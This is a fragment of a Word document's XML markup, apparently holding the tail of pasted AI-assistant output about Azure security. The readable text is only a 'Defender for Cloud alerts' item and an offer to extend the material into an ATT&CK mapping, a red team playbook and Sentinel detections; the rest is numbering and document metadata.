    <w:p w14:paraId="4A396594" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Defender for Cloud alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FACB1D" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:pict w14:anchorId="137A22CA">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4EE40A" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>If you want, I can extend this into:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238F1892" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK mapping (Azure-specific)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AE50B6" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Red Team playbook (step-by-step attack chain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115B2E63" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Top 20 Sentinel detections for Azure abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720F3E64" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8"/>
    <w:p w14:paraId="54F01F0C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7793"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="12D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7792F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB8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2DA9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE1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25F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3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323E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="478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90238"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="832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944C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="133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B69A7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="127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C5551"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BABC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5034A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D47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475CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="599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428780">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1664505982">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1006595025">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="251473921">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1827016638">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1533349296">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1326083359">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1470316471">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1018503189">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="733118406">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="972446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5E"/>
    <w:rsid w:val="000017B5"/>
    <w:rsid w:val="0002203E"/>
    <w:rsid w:val="00033139"/>
    <w:rsid w:val="000439E4"/>
    <w:rsid w:val="0004748A"/>
    <w:rsid w:val="00061F5E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5593C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C51F8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7079F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1DF27B6C-24B5-4AD5-AF34-AA98A80E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F5E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5E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5E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5E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5E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5E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F5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061F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5E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061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5E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061F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55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1491</Words>
  <Characters>8500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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-06T09:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T12:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>